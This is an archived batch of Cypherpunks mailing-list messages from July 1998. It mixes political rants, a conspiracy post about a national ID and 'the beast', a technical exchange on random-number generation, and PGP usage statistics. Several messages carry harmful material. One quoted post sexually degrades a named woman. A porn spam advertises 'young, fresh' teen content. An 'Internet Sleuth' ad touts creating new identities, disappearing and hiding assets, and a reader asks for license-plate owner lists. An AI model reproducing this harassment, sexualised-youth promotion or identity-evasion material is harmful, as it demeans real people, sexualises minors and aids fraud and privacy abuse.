And really let loose with the prose, if you please:  the more insane, the 
more tangential, the better.

>   Perhaps the massive suffering and financial losses that
> he caused in his power-grab might be justified as being
> 'for the greater good,' except that, had he used his position
> as President-elect to help restore confidence in the economy,
> instead of destroying it, America would not have required
> nearly as much 'saving' as it subsequently needed.

Well, the implementation never really does live up to the grand design 
now, does it?  Ask any computer programmer here on this list.

>   It is a shame that I had not been born in an age when I
> could have run for President against Roosevelt, and won.

It is a shame that we'll all just have to endure.

>   Had I done so, then I, like FDR, would have granted 
> myself a license to print money, and I also would have
> spent three times as much of the taxpayer's money as the
> previous 31 Presidents, combined, but *I* would have spent
> it all on beer and scotch, thus resurrecting the American
> economy without creating a HugeGovernmentMonster filled
> with political patronage appointees and employees who I
> had bought and owned with imaginary money that taxpayers
> would be responsible for repaying.

Maybe you're not so crazy after all.  You know, it's not too late to enter 
the race for 2000.  It's a good year to start on, and because of your 
intimate connections with people who are information technology-aware, you 
could make some programmers fabulously wealthy by scamming people on the 
Y2K problem.

>   Also, being drunk all of the time, there would have been
> little chance of me turning America into a PlannedSociety
> via a New Deal in which all of the cards being dealt were 
> Red.

US Grant was also a lush.  How prosperous were those times when he could 
pick himself off the floor?

> ICould'aBeenAContend'aMonger
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I really am enjoying this.  I had apparently a great deal of spare time in 
the dog days of summer to humor the paranoids of the list although I was 
rather dreading the consequences.

*** Object Lesson:  NEVER ARGUE WITH AN INSANE INDIVIDUAL ***

1. You can never come to a compromise or even win:  it requires that the 
two sides be possessed of reason, and you have only half of what you need.

2. There is a risk that you just might start believing what that 
individual believes, especially when you start conceding small points that 
appear to be the truth.  (Don't be fooled.)

3. It reduces you to a less dignified state before your peers.  And 
appearance is everything.  Remember:  Style, not substance.  Form, not 
structure.


Mitch Halloran
Research (Bio)chemist
Duzen Laboratories Group
Ankara   TURKEY
mitch@duzen.com.tr

While in substance it is generally all the same, it still amazes
the observer that one will find that smelling one's own is somehow less
disgusting than smelling someone else's.   --Anonymous





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Tue, 28 Jul 1998 14:42:13 -0700 (PDT)
To: "S. M. Halloran" <mitch@duzen.com.tr>
Subject: and the number of the beast is....
In-Reply-To: <199807281629.TAA25772@ankara.192.168.3.5>
Message-ID: <Pine.BSF.3.96.980728212440.858D-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain



see: http://cgi.pathfinder.com/netly/0,2326,201980727-14191,00.html

Paul may be a kook to some, but he has the courage to stand against 
the forces who wish to take all our liberties --or should I say, those
few we have been permitted to keep.

Is it only a coincidence that the Social Security Admistration published 
the new requirements for the national ID in Section 666 of the code?

   "...and I looked, and behold a pale horse: and his name that sat 
on him was Death, and Hell followed with him." [RV 6-8]

   "and he causeth all, both small and great, rich and poor, free and bond,
to receive a markin  their right hand, or in their foreheads; [Rv13-16]
   "and that no man might buy or sell, save he that had the mark, or the 
name of the beast, or the number of his name; [Rv13-17]
   "Here is wisdom. Let him that hath understanding count the number of 
the beast: for it is the number of a man; and his number is Six Hundred 
threescore and six" [Rv13-18]

    OK, Mitch, it says it all in Revelation --and it is happening. See
    the article on defending yourself from Federal conspiracy charges
    which was posted to the list a few minutes ago by anonymous.

    I always define conspiracy as three guys getting drunk at a bar
    while discussing the idea of robbing the bank across the street.
    one passes out and the other two go across the street and attempt
    to rob the bank; all three are tried and convicted: two for robbing
    the bank; and three for conspiracy to rob the bank.

    so, be careful who you associate with; in Turkey you just might get
    rolled over....

	attila out...   one more time.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 28 Jul 1998 19:35:02 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Re: Fw: 1998-07-28 VP Statement on the Growing Digital Divide
Message-ID: <199807290250.WAA11287@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Jul 98 01:19:56 -0000 (DST), kryz wrote:


>>                      Office of the Vice President
>> ________________________________________________________________________
>> For Immediate Release                                      July 28, 1998
>> 
>> 
>> 
>>                     STATEMENT BY VICE PRESIDENT GORE 
>>                  ON DEPARTMENT OF COMMERCE REPORT ABOUT
>>                        THE GROWING DIGITAL DIVIDE

>>  The data shows that, although many more Americans now own computers,
>> minorities and low-income households are still far less likely to have
>> personal computers or on-line access to the Internet than white or more
>> affluent households.

Geee... who would have suspected that?!?

>> and Internet access -- with the deepest discounts going to the poorest
>> urban and rural schools.

> 
>>  In short, the E-Rate program will enable all of our children to mine
>> the riches

Yeah, mine the rich, just like "milk the cows" ...

>> will have access to the same universe of knowledge as a child in the
>> most affluent suburb.

But what about the child of the rich that got just a little less rich for 
making the unrich richer and by being unrich, cannot make or affort the 
latest "save the world gizmo" who would have made us all more richer?

>>  Now is the time to bridge the digital divide, prevent those who can
>> benefit the most from falling through the net, and move forward with the

Three cheers for Komrad Gore!

Ciao

JFA



 " There can be no compromise on basic principles. There can be no compromise on moral issues. There can be no compromise on matters of knowledge, of truth, of rational conviction." -Ayn Rand


"The government has no source of revenue, except the taxes paid by the producers.  To free itself -for a while- from the limits set by reality, the government initiates a credit con game on a scale which the private manipulator could not dream of.  It borrows money from you today, which is to be repaid with money it will borrow from you day after tomorrow, and so on.  This is known as "deficit financing."  It is made possible by the fact that the government cuts the connection between goods and money.  It issues paper money, which is used as a claim check on actually existing goods-but that money is not backed by any goods, it is not backed by gold, it is backed by nothing.  It is a promissory note issued to you in exchange for your goods, to be paid by you (in the form of taxes) out of your future production." 
-Ayn Rand






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BagbyHtSpg@aol.com
Date: Tue, 28 Jul 1998 20:57:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: vehicle plate owner registration
Message-ID: <fac57e70.35be9d68@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi- whether the law has changed or not, what is the status of getting lists of
oregon license plate owner's perhaps from previous sources?  If this is either
very illegal, or no longer possible please let me know thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Art1Carol" <prolinemarketing@email.msn.com>
Date: Tue, 28 Jul 1998 23:15:40 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Spamming
Message-ID: <000101bdbad1$11dbf180$cd58fed0@default>
MIME-Version: 1.0
Content-Type: text/plain


I do not spam! I don't think....The Government Lets it's post office's
around the country spam everyone every day, for the postage Don't we wish we
had a delete button for that?

As a matter of fact when Uncle Bill and the henchmen in Washington can
figure out how to make a profit off of email, "and they will" there won't be
any spamming laws because uncle Tax will be making a windfall of money.

I do believe each provider should have a block for unsolicited email and
instruct their customers how to use it, and if they don't, Spam Away...

The people who cry about spamming, don't know what they are going to create,
wait til they send thier loved ones an email and get charged for it, then
they'll wish they would have shut up and used the delete button....Thanks
Art smith







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Tue, 28 Jul 1998 21:45:30 -0700 (PDT)
To: cypherpunks@toad.com
Subject: none
Message-ID: <19980729044501.314.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


BagbyHtSpg@aol.com wrote:
> 
> Hi- whether the law has changed or not, what is the status of getting lists of
> oregon license plate owner's perhaps from previous sources?  If this is either
> very illegal, or no longer possible please let me know thank you.

Sure, no problem. Just send fifty bucks per plate, money orders only 
(do not fill in the "pay to the order of" part) to me, Sammy, at:

Oregon State Penitentiary
2004 Coastal Hwy.
Portland, Oregon 89002
Attn: Sammy Polinski A 44E52J (Block 9)

That's $50.00 per address/plate, no questions asked. Nice doin business withdya.

Sammy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Wed, 29 Jul 1998 05:47:38 -0700 (PDT)
To: Mark Hedges <cypherpunks@toad.com
Subject: Re: infant SSN assignment (whoops)
In-Reply-To: <Pine.SOL.3.96.980729020650.14013C-100000@rigel.infonex.com>
Message-ID: <35BF1A96.BC2DBCF5@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


I remember discussing the changes with a friend around 1991. At the time
I was reading the changes noted to the law in IRS publication no. 17. I
believe it is also noted on Form 1040 (look in the area used for
children's SSN, it should be ref. in the instructions). Between the two
of these, you should get a pointer to the code, and all of these are
available online. The IRS is the only agency, that I have know, of using
this law and, again, I think that congress made it law c. '91.

Richard Storey

Mark Hedges wrote:
> 
> Could someone kindly point toward an authoritative resource which proves
> assignment of SSN's to newborns is mandatory? Gratzi. -hedges-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Tue, 28 Jul 1998 18:20:10 -0700 (PDT)
To: kryz <chrisharwig@hetnet.nl>
Subject: Re: Rinda Leed
In-Reply-To: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
Message-ID: <Pine.GSO.3.96.980729091759.11675B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


What the?!?!

I'm amazed, this site is not only about "encrypt...." but for the creep
also!?

===============================================================================
You give the words  you have spoken,
   it is not lended and are not taken back.
It is like what The Corrs sung "...your forgiven not forgotten...."

bbt@mudspring.uplb.edu.ph
bbt@peak-two.uplb.edu.ph
metaphone@altavista.net

On Wed, 29 Jul 1998, kryz wrote:

> Guys (and Girls),
> Not looking OverShoulder but BetweenLegs (both "TM") I found out (through
> European North-Sea Channel) that Rinda Leed aka Linda Reed is suffering a
> severe form of Post-Menstruation-Disorder.
> Also her Labia Majora are inflamed and bleedy so she can't sit on her
> keyboard without clottering it while typing.
> FDR... Fucking De Republic?
> Let's pray for Hur.
> 
> 
> Chris Harwig
> Nieuwegein, United Netherlands
> <chrisharwig@hetnet.nl>
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nulo66@interaktiv.design.no
Date: Wed, 29 Jul 1998 00:54:47 -0700 (PDT)
To: nulo66@interaktiv.design.no
Subject: No Subject
Message-ID: <199807292318UAA12018@127.70.34.15>
MIME-Version: 1.0
Content-Type: text/plain




They're Young !
They're Fresh !
They're Beautiful !
They're L I V E !!!

And They are yours FREE for 1 week.


Stop by and take a look:

http://207.212.128.4/newteenpics/xxxteen/enter.html





 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 29 Jul 1998 01:01:46 -0700 (PDT)
To: David Honig <honig@m7.sprynet.com>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <35BED6DF.F2EF9BC5@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain


David Honig wrote:
> 
> At 10:40 AM 7/28/98 +0100, Mok-Kong Shen wrote:
> >David Honig wrote:
> >
> >> The output of a good block cipher in feedback mode will pass Diehard tests,
> >> though it is not crypto-secure.
> >
> >I often see the phrase 'pass Diehard test' though I don't see from
> >the documents of Diehard how to evaluate the volumenous printout
> >of Diehard to say exactly whether the test is passed or not. Furthermore
> >the component asc2bin.exe of Diehard is buggy.

> 
> My rough understanding: the 'P' value is a measure on the hypothesis that
> the test sample is a truly random sample, where truly random is defined by
> the expected
> statistical properties being measured.  Eg in 100 bits you expect to find
> 50 1's;
> if you count 48, is your 100-bit sample consistant with it being
> unpredictable?

My concrete problem is: With the bunch of p-values how does one
(in accordance with the intention of the designer of the package)
go about to determine that the test is passed at a certain confidence
level. I don't see anything in the documents instructing the user
to do this. Maybe I indeed missed something. Please point that out
in this case.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Wed, 29 Jul 1998 10:45:32 -0700 (PDT)
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <3.0.5.32.19980729104423.007c3780@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:01 AM 7/29/98 +0100, Mok-Kong Shen wrote:
>
>My concrete problem is: With the bunch of p-values how does one
>(in accordance with the intention of the designer of the package)
>go about to determine that the test is passed at a certain confidence
>level. I don't see anything in the documents instructing the user
>to do this. Maybe I indeed missed something. Please point that out
>in this case.
>
>M. K. Shen

I don't believe the depth of info you want is in Marsaglia's distribution
notes.
You want to talk to a real statistician...





honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kurt Wolter <serpent@rths.rochelle.net>
Date: Wed, 29 Jul 1998 09:42:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Free NNTP server question...
Message-ID: <35BF528E.E3912B86@rths.rochelle.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi cypherpunks,

I grabbed your email address of an html posting of this newsgroup - in
other words, your my randomly selected answer person(s).

My question:  My isp doesn't have an NNTP Server, but I'm under the
impression that I can use a "free" news server somehow.  I need to be
pointed in the direction of how to set up news with a server other than
my isp.

Thanks,

serpent@rths.rochelle.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Wed, 29 Jul 1998 07:43:49 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: My hubby smears curry on my breasts/17in willy too heavy to carry
Message-ID: <19980729122608.6650.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/29/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Wed, 29 Jul 1998 11:18:36 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 29, 1998
Message-ID: <199807291804.NAA26214@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Wed, 29 Jul 1998 10:05:21 -0700 (PDT)
To: Jim Gillogly <cypherpunks@toad.com
Subject: present president
In-Reply-To: <9807291631.AA06499@mentat.com>
Message-ID: <35BF56FA.31872612@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Jim Gillogly wrote:
> 
> However, SSN abuse seems like pretty thin [ice?] grounds, and not specifically attributable to the current President.
>         Jim Gillogly


Yes, perjury, conspiracy, and other possible felonies seem to be much
more in evidence--for now.

Richard Storey




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Wed, 29 Jul 1998 15:38:08 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Amused but still looking for...
Message-ID: <35BFA4BF.2A17@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain


I love the SPACE ALIENS stuff : it's like the X-files on a druggie's
version of a Long Island Iced Tea. The politics are agreeable and
predictable. The up-to-the-minute news and the entertainment is fun but
there's really not much that is technical happening here.

Is there a coderpunks mail archive available anywhere? The URL that I've
found has been down for too long.

How about a list of ongoing projects?

When is the next CP meeting?

Mike

"Just because a taste of freedom made you lose your lunch doesn't mean
it should be removed from the menu."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Wed, 29 Jul 1998 23:45:25 -0700 (PDT)
To: David Honig <cypherpunks@toad.com
Subject: Re: encrypted FM radio hiss
In-Reply-To: <3.0.5.32.19980727110437.007b8100@m7.sprynet.com>
Message-ID: <3.0.5.32.19980729164034.008dc100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 7/27/98 -0700, David Honig wrote, about (Real, not Pseudo) RNGs:
>Poor RNG ----> XOR ----> BlockCipher ----> improved RNG?
>                 ^                    |
>                 |____________________|
>The output of a good block cipher in feedback mode will pass Diehard tests,
>though it is not crypto-secure.
>From an information theoretic perspective, in the above scheme, you are
>slowly adding entropy to the output stream, at a rate determined by the
>actual number of bits/iteration and the bits/symbol of your poor random
>numbers.

It's an interesting problem, and I doubt there's a consensus on strength,
in particular, on how much randomness is left after you take a
random sample out of the system.  I'd feel much better if you
also ran the output through a keyed hash before giving it to anyone
(e.g. run pairs or triples of 64-bit blocks plus a private salt through MD5.)
With a perfectly strong RNG, the output should also be perfectly strong,
though with a weak RNG, the block cypher does add some correlation.

You definitely should trash the initial outputs, until you've added
enough bits of real randomness that the block chaining step has
probably accumulated a whole block's worth of randomness.
Otherwise, the first round of block cypher is an ECB on a small
set of input data (e.g. 64 possible values of one 1 and 63 0s
fed into a DES cracker.)


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 29 Jul 1998 14:16:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Losing Crypto Experts
Message-ID: <199807292116.RAA13371@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Government Executive, August, 1998:

The National Security Agency is losing ground in the fight
to keep hard-to-find cryptography experts from being lured
to greener pastures.

By Richard Lardner

Price Waterhouse didn't become a force in the consulting
world by ignoring market trends. So it was no surprise when
the firm decided to expand its information security
operation. After all, the Internet has completely changed
the way business is done: Paper is out, electrons are in.
But just as electronic commerce is skyrocketing, so too are
the odds that sensitive corporate information might be
tampered with as it travels through cyberspace. 

With the private sector beginning to recognize that the
digital door swings both ways, there's growing demand for
the "risk management" services Price Waterhouse and other
companies are offering to help keep the hackers at bay. To
snare these potential clients, the company needed to hire
hundreds of information technology professionals. Trouble
is, information protection may be a huge growth area, but
the talent pool is mighty shallow. 

So officials at Price Waterhouse did what many other
commercial enterprises have done, and continue to do. They
targeted a group of employees at the Defense Department's
secretive National Security Agency, where thousands of the
federal government's best and brightest spend their days
eavesdropping on other countries while at the same time
ensuring that U.S. information networks are secure. Because
of the highly sensitive missions the agency performs,
companies like Price Waterhouse know they are getting
employees who are extremely good at what they do and are
solid citizens too-NSA is picky about whom it hires and
conducts thorough background investigations. 

Full text:

   http://www.jya.com/nsa-loss.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CLCTCHR@aol.com
Date: Wed, 29 Jul 1998 18:07:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MORE!!!!
Message-ID: <407bc87c.35bfc6d9@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


More!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Babybee390@aol.com
Date: Wed, 29 Jul 1998 18:25:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: vinyl stickers
Message-ID: <57a0eea8.35bfcae7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


do you have music vinyl stickers , if so , could i get them wholesale?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <remailer@htp.org>
Date: Wed, 29 Jul 1998 16:05:31 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Spamming
Message-ID: <19980729230502.23037.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 Jul 1998, Art1Carol wrote:

> 
> I do not spam! I don't think....The Government Lets it's post office's
> around the country spam everyone every day, for the postage Don't we wish we
> had a delete button for that?

Hello, McFly? Anybody home? McFly!

When somebody sends mail through the postal service, they pay postage. It
costs the recipient nothing and, if anything, is actually useful for
getting a fire started in the winter. When somebody spams through the
Internet, they pay virtually nothing, yet everybody else gets to pay to
deliver, store, and filter the shit. Then there are the morons who connect
to other peoples' machines and use those to relay mail; that's quite
obviously theft.

Take your spam, for instance. You go out and pay MSN a bit of money for
some account. You mail the Cypherpunks list with your ad for porn or
whatever it was. The list operators then have to deliver it to a few
thousand people. You steal the resources of the CDR operators to deliver
it. You steal the resources of the Cypherpunks to store it. You steal CPU
time all over the place to filter it. You steal bandwidth all over the
place to deliver it.

This is obvious to anybody with more than a few dozen brain cells to rub
together. Then again, this kind of grammatically-challenged and logically
invalid garbage is what I've come to expect from users of lame services
like AOL, Prodigy, MSN, Hotmail, et al. It goes with the territory for
sites which cater to the lowest common denominator.

> I do believe each provider should have a block for unsolicited email and
> instruct their customers how to use it, and if they don't, Spam Away...

Right, and they still get to pay for the transmission, temporary storage,
filtering, etc.

Let's see. Say I filter it. My ISP gets the spam. It has to store it. I
log into the POP3 server to get my mail. I have to transfer it. After it's
been stored on the ISP for quite a while, after it's been transmitted,
after it's eaten my bandwidth, and after I've waited around for it to
transfer, I have to blow CPU time to filter it. 

Yeah, like in postal junk mail the sender is really the one paying, not
the recipient. 

Your clue check has bounced.

[Remainder of drivel snipped.]

Copy to MSN. Copy to the Cypherpunks list for the other lamers who like to
spam it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 30 Jul 1998 00:22:20 -0700 (PDT)
To: Michael Motyka <cypherpunks@toad.com
Subject: Re: Amused but still looking for...
In-Reply-To: <35BFA4BF.2A17@lsil.com>
Message-ID: <3.0.5.32.19980730002024.0095d100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:39 PM 7/29/98 -0700, Michael Motyka wrote:
>Is there a coderpunks mail archive available anywhere? The URL that I've
>found has been down for too long.
>
>How about a list of ongoing projects?
>
>When is the next CP meeting?

Meetings are the second Saturday of the month (for the Bay Area).
Directions and agenda will be posted early next week;
volunteers for talks are always welcome.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Wed, 29 Jul 1998 16:18:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: cryptographic signatures
Message-ID: <m0z1fQa-0003bfC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


A few months ago I posted statistics of the types of digital
signatures used on Usenet and in mailings lists. It turns out that the
moderators' signatures in a moderated newsgroup were tabulated for the
individual posters, resulting in somewhat too big figures for one
particular version of PGP.

Here are the current figures:

   56.6% PGP 2.*
   33.7% PGP 5.*
    3.6% other OpenPGP implementations
    4.0% S/MIME

The sample contains 249 unique (e-mail address, software version)
pairs taken from various international and local newsgroups and
mailing lists that happen to be available in my news spool (consisting
of some 24,000 articles). Perhaps someone with a full newsfeed
-- whatever that is in these days -- would like to try the same?

These are the PGP Version headers:

     55	2.6.2
     24	2.6.3i
     19	2.6.3ia
     17	PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>
     15	2.6.3in
     14	PGP for Personal Privacy 5.0
     10	PGP for Personal Privacy 5.5.3
      9	2.6.3a
      8	PGPfreeware 5.0i for non-commercial use
      7	PGP 5.5.5
      6	2.6.2i
      4	PGP for Personal Privacy 5.5.5
      4	2.6.3a-sha1
      3	PGP for Personal Privacy 5.0.1iRu
      3	PGP for Business Security 5.5
      3	2.6.3
      2	PGPfreeware 5.5.5 for non-commercial use <http://www.nai.com>
      2	PGPfreeware 5.5.3i for non-commercial use
      2	PGP for Business Security 5.5.6
      2	PGP for Business Security 5.5.2
      2	PGP Cyber-Knights Templar build 5.5.3ckt
      2	GNUPG v0.3.1 (GNU/Linux)
      2	GNUPG v0.3.0 (GNU/Linux)
      2	CTCDOS 0.1
      1	Version 2.0.0
      1	PGPfreeware 5.5.3i for non-commercial use 
      1	PGPfreeware 5.5.3 for non-commercial use <http://www.pgp.com>
      1	PGPfreeware 5.5.2 for non-commercial use <http://www.pgp.com>
      1	PGPfreeware 5.0 for non-commercial use <http://www.pgp.com>
      1	PGP for Personal Privacy 5.5
      1	PGP 5.5.3  It's not only for cool looking messages!
      1	PGP 5.0i
      1	PGP 5.0
      1	GNUPG v0.3.2a (GNU/Linux)
      1	GNUPG v0.3.2 (GNU/Linux)
      1	GNUPG v0.3.1a (GNU/Linux)
      1	4.0 Business Edition
      1	2.7.1
      1	2.7
      1	2.6.i
      1	2.6.3uin
      1	2.6.1
      1	2.6




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: quickfacts9@hotmail.com
Date: Thu, 30 Jul 1998 06:17:59 -0700 (PDT)
Subject: They Can Even Steal Your Identity!
Message-ID: <QQfagr16752.199807301316@relay1.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


ARE YOU BEING INVESTIGATED?

Has your personal and credit information been stolen?  Has someone
assumed your identity?

Would you like to locate an old friend, relative, military buddy or sweetheart?

Do you want to find a person's assets to collect a debt or judgement?

Would you like to check a person's criminal record before renting
them space or giving them employment?

Would you like to fix up your credit bureau report, create a new
identity or even disappear?

Are you going to have surgery?  Would you like to know how many malpractice 
suits have been filed against your doctor?

Now you can learn all this plus much, much more with our 
brand new 45  page report 

"INTERNET SLEUTH"!

Learn the Internet tools and resources that are used to investigate you,
your relatives, friends, neighbors, enemies, employees or anyone else!  

We will give you thousands of Internet locations to look up people,
credit, social security, current or past employment, driving records, 
criminal records, medical information, military records, addresses,
phone numbers, immigration, divorce, labor and criminal laws!

We will also give you sources to find missing children and parents,
hazardous waste sites, how to do Freedom of Information Act information
searches, how to do skip tracing and backround checks on prospective dates, 
brides or grooms, employees, renters, vendors, new clients and competitors!

You will also learn about and where to get surveillance and spy devices,
private mail forwarding and annonymous email forwarding sites, search 
for copyrights, patents and court cases and how to make your
assets untraceable!  We will show you how to get copies of 
credit reports, adoption databases, information on drugs, 
poisons and how to get your share of government programs and benefits!

Can you find this information by using the Internet Search Engines?
The answer is MAYBE if you get lucky and if you want to spend many
hours going through 25,000 plus hits per subject!  We and our staff
have spent hundreds of hours and many thousands of dollars compiling 
this information for you!  Now you can have it on a silver platter
for LESS THAN TWENTY BUCKS during this special email promotion!

You frequently hear over the media, television, radio, the newspapers, 
how personal information is being used, traded and 
sold over the Internet...usually without your permission or knowledge. 
Our report will show you HOW IT IS DONE!!!

Would you like to find that old romantic flame...find telephone, 
address or email information on almost anyone...even unlisted
phone numbers?  How about your family "tree"?  We will teach
you how to turn years of work into hours of fun!

Military?  Check Army, Navy, Air Force and Marine records. 
extensive Vietnamese war records, MIA info, much more!

Looking for a job?  Find the job you are seeking...even in another state
or another country!  We will teach you how!

Looking for a new love interest or spouse or even sex partner? 
We will show you where to look for fast results!

Want up-to-the-minute health and medical information?  Learn how to 
cure fears and phoebias, the latest drugs and treatments for almost
any ailment or desease from the drug companies themselves as well as
from universities and the Center for Desease Control.  Want to learn
the most effective way to loose weight?  It's all here in our report!

If you believe that the information compiled  about you should be as
available to you as to the people that compile it about you without
your knowledge or permission than you must order "THE INTERNET
SLEUTH REPORT" immediately!

Our "INTERNET SLEUTH REPORT" is normally sold by direct mail for
$39.95 and will soon be in book stores for $29.95.  However, to
generate publicity and "get the word out" we are making this 
10 day Email Special Offer of our Complete 45 Page Report for
only  $19.95 plus $3 for shipping and handling [total $22.95].
Sold with our 10 Day Money Back Guarantee!

This is the biggest bargain on the Internet and the information it
will give to you will give you great power!  It can really change your
life in a positive way.  Order Now!

The Complete 45 page "INTERNET SLEUTH REPORT" only $19.95 plus
$3 shipping and handling - total $22.95.  Shipped in plain wrapper
by First Class Mail.

Add $5 for priority mail delivery.  Add $20 for overnight Express!

We accept Visa, MasterCard, American Express or Discover.
We can also accept your check by phone or Fax.

You may order by phone 9 am to 10 pm [NY Time] by phoning
[718] 287-3800

You may order by fax 24 hours per day by phoning our fax line at
[718] 462-5920.
You can fax your credit card information or your check

To Email your order - DO NOT HIT REPLY ON YOUR KEYBOARD

Send email to our special email address below:

instantinfo2@juno.com

[Note: If you order by email and do not receive an email confirmation within
24 hours, please phone our office at 718-287-3800]


You can also order by mail by sending $22.95 cash, check, money order
or major credit card [Visa, MasterCard, American Express or Discover] to

TCPS, INC.
4718  18th Ave.  Suite 135
Brooklyn, NY 11204

Make Checks & Money Orders Payable to TCPS, Inc.
New York State Residents Please Add $1.70 for Sales Tax

The Following Order Form is for Your Convenience!
Use it by Mail, Fax or Email!
.............................................................................................................

Please ship me ________copies of the INTERNET SLEUTH Report

at $19.95 each plus $3.00 for shipping and handling [$22.95]

Signature______________________________________________

Credit Card #____________________________Exp date______

Ship to:  Name_________________________________________

Address________________________________________________

City________________________State___________Zip________

Area Code and Home Phone  [    ]___________________________

Fax # [     ]______________________________________________

Email Address___________________________________________

To remove your name from our mailing list, send us an email with 
